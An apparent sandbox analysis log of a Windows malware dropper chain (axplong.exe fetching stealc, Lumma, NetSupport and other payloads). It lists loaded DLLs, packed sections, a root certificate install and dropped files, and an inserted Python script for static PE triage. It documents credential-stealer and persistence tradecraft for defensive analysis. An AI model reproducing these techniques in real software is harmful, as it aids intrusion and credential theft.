Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: file.exe Static file information: File size 1940480 > 1048576
Source: file.exe Static PE information: Raw size of tutljgzd is bigger than: 0x100000 < 0x1a8200
Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: RegAsm.exe, 0000000B.00000002.3536050802.0000000005D88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mozglue.pdbP source: stealc_default2.exe, 00000017.00000002.3113843128.000000006958D000.00000002.00000001.01000000.0000001C.sdmp, svchost015.exe, 0000001E.00000002.3461869295.0000000068EFD000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000000B.00000002.3536050802.0000000005D88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdb8 source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nss3.pdb@ source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: System.ServiceModel.pdb693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32^ source: RegAsm.exe, 0000000B.00000002.3518496175.0000000000DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000000B.00000002.3516704262.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.ServiceModel.pdb source: RegAsm.exe, 0000000B.00000002.3536050802.0000000005DCA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 0000000B.00000002.3518496175.0000000000DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: stealc_default2.exe, 00000017.00000002.3113843128.000000006958D000.00000002.00000001.01000000.0000001C.sdmp, svchost015.exe, 0000001E.00000002.3461869295.0000000068EFD000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: c:\rje\tg\7v\obj\Release\Qrr.pdb source: axplong.exe, 00000006.00000002.3518419435.0000000000F15000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3252257395.0000000000F15000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3252600342.0000000000F26000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.b50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tutljgzd:EW;nhtewlaz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tutljgzd:EW;nhtewlaz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 2.2.axplong.exe.200000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tutljgzd:EW;nhtewlaz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tutljgzd:EW;nhtewlaz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 3.2.axplong.exe.200000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tutljgzd:EW;nhtewlaz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tutljgzd:EW;nhtewlaz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 6.2.axplong.exe.200000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tutljgzd:EW;nhtewlaz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tutljgzd:EW;nhtewlaz:EW;.taggant:EW;
Source: Yara match File source: 35.2.rstxdhuj.exe.5fa0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000002.3310805165.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.3116851630.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: penis[1].exe.6.dr Static PE information: 0xFDE1D90B [Tue Dec 23 00:53:31 2104 UTC]
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: random[1].exe.6.dr Static PE information: real checksum: 0x1cf94b should be: 0x1d61a0
Source: Nework[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0x6abc6
Source: gold.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x5aa4a
Source: needmoney.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x417a7a
Source: needmoney[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0x417a7a
Source: 12dsvc[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0xe2c06
Source: axplong.exe.0.dr Static PE information: real checksum: 0x1dfdb9 should be: 0x1dd3b6
Source: stealc_default2.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x31181
Source: penis[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0x6b425
Source: 12dsvc.exe.6.dr Static PE information: real checksum: 0x0 should be: 0xe2c06
Source: Nework.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x6abc6
Source: stealc_default2[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0x31181
Source: file.exe Static PE information: real checksum: 0x1dfdb9 should be: 0x1dd3b6
Source: 3ab68b6f1f.exe.6.dr Static PE information: real checksum: 0x1d6d24 should be: 0x1df226
Source: c6f71c9f40.exe.6.dr Static PE information: real checksum: 0x1cf94b should be: 0x1d61a0
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x1d6d24 should be: 0x1df226
Source: gold[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0x5aa4a
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: tutljgzd
Source: file.exe Static PE information: section name: nhtewlaz
Source: file.exe Static PE information: section name: .taggant
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: tutljgzd
Source: axplong.exe.0.dr Static PE information: section name: nhtewlaz
Source: axplong.exe.0.dr Static PE information: section name: .taggant
Source: Microsoft-Edge[1].exe.6.dr Static PE information: section name: .xdata
Source: Microsoft-Edge[1].exe.6.dr Static PE information: section name: /4
Source: Microsoft-Edge[1].exe.6.dr Static PE information: section name: /19
Source: Microsoft-Edge[1].exe.6.dr Static PE information: section name: /31
Source: Microsoft-Edge[1].exe.6.dr Static PE information: section name: /45
Source: Microsoft-Edge[1].exe.6.dr Static PE information: section name: /57
Source: Microsoft-Edge[1].exe.6.dr Static PE information: section name: /70
Source: Microsoft-Edge[1].exe.6.dr Static PE information: section name: /81
Source: Microsoft-Edge[1].exe.6.dr Static PE information: section name: /92
Source: Microsoft-Edge.exe.6.dr Static PE information: section name: .xdata
Source: Microsoft-Edge.exe.6.dr Static PE information: section name: /4
Source: Microsoft-Edge.exe.6.dr Static PE information: section name: /19
Source: Microsoft-Edge.exe.6.dr Static PE information: section name: /31
Source: Microsoft-Edge.exe.6.dr Static PE information: section name: /45
Source: Microsoft-Edge.exe.6.dr Static PE information: section name: /57
Source: Microsoft-Edge.exe.6.dr Static PE information: section name: /70
Source: Microsoft-Edge.exe.6.dr Static PE information: section name: /81
Source: Microsoft-Edge.exe.6.dr Static PE information: section name: /92
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: llbyxbem
Source: random[1].exe.6.dr Static PE information: section name: vndwcpmt
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: c6f71c9f40.exe.6.dr Static PE information: section name:
Source: c6f71c9f40.exe.6.dr Static PE information: section name: .rsrc
Source: c6f71c9f40.exe.6.dr Static PE information: section name: .idata
Source: c6f71c9f40.exe.6.dr Static PE information: section name:
Source: c6f71c9f40.exe.6.dr Static PE information: section name: llbyxbem
Source: c6f71c9f40.exe.6.dr Static PE information: section name: vndwcpmt
Source: c6f71c9f40.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: xmjcxhmw
Source: random[1].exe0.6.dr Static PE information: section name: lqsidhwe
Source: random[1].exe0.6.dr Static PE information: section name: .taggant
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name:
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name: .idata
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name:
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name: xmjcxhmw
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name: lqsidhwe
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0021D84C push ecx; ret 6_2_0021D85F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0648E320 push es; ret 11_2_0648E330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0648EFB2 push eax; ret 11_2_0648EFC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0648C9E1 push es; ret 11_2_0648C9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00428E7D push esi; ret 15_2_00428E86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_004076E0 push ecx; ret 15_2_004076F3
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004F7333 push 04EC839Eh; mov dword ptr [esp], edi 16_2_004F733A
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_058EC413 push ss; iretd 17_2_058EC41A
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_058EC411 push ss; iretd 17_2_058EC412
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_06AF369F push ebx; iretd 17_2_06AF36A2
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_06AF3721 push esp; iretd 17_2_06AF3722
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_06AF3743 push ebp; iretd 17_2_06AF374A
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_06AF3740 push esi; iretd 17_2_06AF3742
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_06AF35E3 push ebx; iretd 17_2_06AF35EA
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_06AF4261 pushad ; iretd 17_2_06AF4262
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Code function: 17_2_06AFECF2 push eax; ret 17_2_06AFED01
Source: file.exe Static PE information: section name: entropy: 7.97957201146314
Source: file.exe Static PE information: section name: tutljgzd entropy: 7.954503942992439
Source: axplong.exe.0.dr Static PE information: section name: entropy: 7.97957201146314
Source: axplong.exe.0.dr Static PE information: section name: tutljgzd entropy: 7.954503942992439
Source: random[1].exe.6.dr Static PE information: section name: llbyxbem entropy: 7.9547357115051796
Source: c6f71c9f40.exe.6.dr Static PE information: section name: llbyxbem entropy: 7.9547357115051796
Source: random[1].exe0.6.dr Static PE information: section name: entropy: 7.982298825407469
Source: random[1].exe0.6.dr Static PE information: section name: xmjcxhmw entropy: 7.954658026811254
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name: entropy: 7.982298825407469
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name: xmjcxhmw entropy: 7.954658026811254
Source: gold[1].exe.6.dr Static PE information: section name: .text entropy: 7.996189613972712
Source: gold.exe.6.dr Static PE information: section name: .text entropy: 7.996189613972712
Source: 12dsvc[1].exe.6.dr Static PE information: section name: .text entropy: 7.999068736163035
Source: 12dsvc.exe.6.dr Static PE information: section name: .text entropy: 7.999068736163035
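The section-name and entropy lines above come from two cheap static checks: section names that no ordinary compiler emits (random eight-letter names, blank names, names with special characters) and per-section Shannon entropy close to 8 bits per byte, which is what a packed or encrypted payload looks like. The Python script below is an added illustration, not part of this report or of the sandbox that produced it. It parses a PE section table with the standard library only and applies those checks together with the writable-.text check from the signature list. It runs on a constructed PE32 image built inside the script; the name tutljgzd is borrowed from this report, and the 7.0-bit threshold and the list of "common" section names are assumptions of the example.

```python
import hashlib
import math
import struct

# Section-header Characteristics flags from the PE/COFF specification (winnt.h).
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Names an unremarkable MSVC or MinGW build carries (assumed list); anything else is
# worth a look. "/N" names are COFF string-table offsets used for long section names
# (common in MinGW debug builds) and are not flagged on their own.
COMMON_SECTION_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                        ".edata", ".pdata", ".xdata", ".bss", ".tls", ".CRT"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(image: bytes) -> list:
    """Walk the section table of a PE image; returns one dict per section header."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + size_of_optional                  # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(num_sections):
        off = table + 40 * i
        name = image[off:off + 8].rstrip(b"\0").decode("latin-1")
        virtual_size, virtual_address, raw_size, raw_ptr = struct.unpack_from("<IIII", image, off + 8)
        characteristics = struct.unpack_from("<I", image, off + 36)[0]
        raw = image[raw_ptr:raw_ptr + raw_size]           # entropy is taken over SizeOfRawData bytes
        sections.append({"name": name, "virtual_address": virtual_address,
                         "virtual_size": virtual_size, "raw_size": raw_size,
                         "characteristics": characteristics, "entropy": shannon_entropy(raw)})
    return sections


def triage_sections(image: bytes, entropy_threshold: float = 7.0) -> list:
    """Apply the static checks behind the report's section-name and entropy lines."""
    findings = []
    for s in parse_sections(image):
        label = repr(s["name"])
        if not s["name"]:
            findings.append(f"{label}: empty section name")
        elif not all(0x20 < ord(c) < 0x7F for c in s["name"]):
            findings.append(f"{label}: section name contains non-printable characters")
        elif s["name"] not in COMMON_SECTION_NAMES and not s["name"].startswith("/"):
            findings.append(f"{label}: non-standard section name")
        if s["entropy"] >= entropy_threshold:
            findings.append(f"{label}: entropy {s['entropy']:.2f} (likely packed or encrypted)")
        if s["name"] == ".text" and s["characteristics"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{label}: code section is writable (in-place unpacking or self-modifying code)")
    return findings


def build_sample_pe() -> bytes:
    """Constructed PE32 image for the demonstration; it is not one of the report's samples."""
    packed = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))  # pseudo-random, ~7.95 bits/byte
    code = b"\x55\x8b\xec\x83\xec\x10\x90\xc3" * 64                           # repetitive x86 prologue bytes
    rwx = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    layout = [
        (b".text", code, rwx),                                                  # writable .text
        (b"tutljgzd", packed, rwx),                                             # random name, high entropy
        (b"", b"\0" * 256, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),  # blank name
    ]
    e_lfanew, size_of_optional = 0x40, 224
    headers_end = e_lfanew + 4 + 20 + size_of_optional + 40 * len(layout)
    first_raw = (headers_end + 0x1FF) & ~0x1FF                                 # 512-byte file alignment
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, size_of_optional, 0x0102)
    optional = struct.pack("<H", 0x10B) + b"\0" * (size_of_optional - 2)       # PE32 magic, rest zeroed
    table, body, va = b"", b"", 0x1000
    for name, data, flags in layout:
        raw_size = (len(data) + 0x1FF) & ~0x1FF
        table += name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", len(data), va, raw_size,
                                                    first_raw + len(body), 0, 0, 0, 0, flags)
        body += data.ljust(raw_size, b"\0")
        va += (len(data) + 0xFFF) & ~0xFFF
    return (dos + b"PE\0\0" + coff + optional + table).ljust(first_raw, b"\0") + body


if __name__ == "__main__":
    for s in parse_sections(build_sample_pe()):
        print(f"{s['name']!r:12} raw={s['raw_size']:6d} flags=0x{s['characteristics']:08X} entropy={s['entropy']:.3f}")
    for finding in triage_sections(build_sample_pe()):
        print("!", finding)
```

Entropy alone is a weak signal: a legitimate .rsrc section holding compressed images or a signed installer payload also sits above 7.9, so the checks are meant to be read together, which is why the report pairs the entropy lines with the section-name and writable-.text findings.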

Persistence and Installation Behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Microsoft-Edge[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\neon[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe File created: C:\Users\user\AppData\Local\Temp\svchost015.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File created: C:\Users\user\AppData\Local\Temp\NetSup_Buil2d.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\needmoney[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe File created: C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000356001\neon.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\crypted[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000355001\3ab68b6f1f.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\gold[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\12dsvc[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\stealc_default2[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\newbundle2[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\rstxdhuj[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\LummaC222222[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
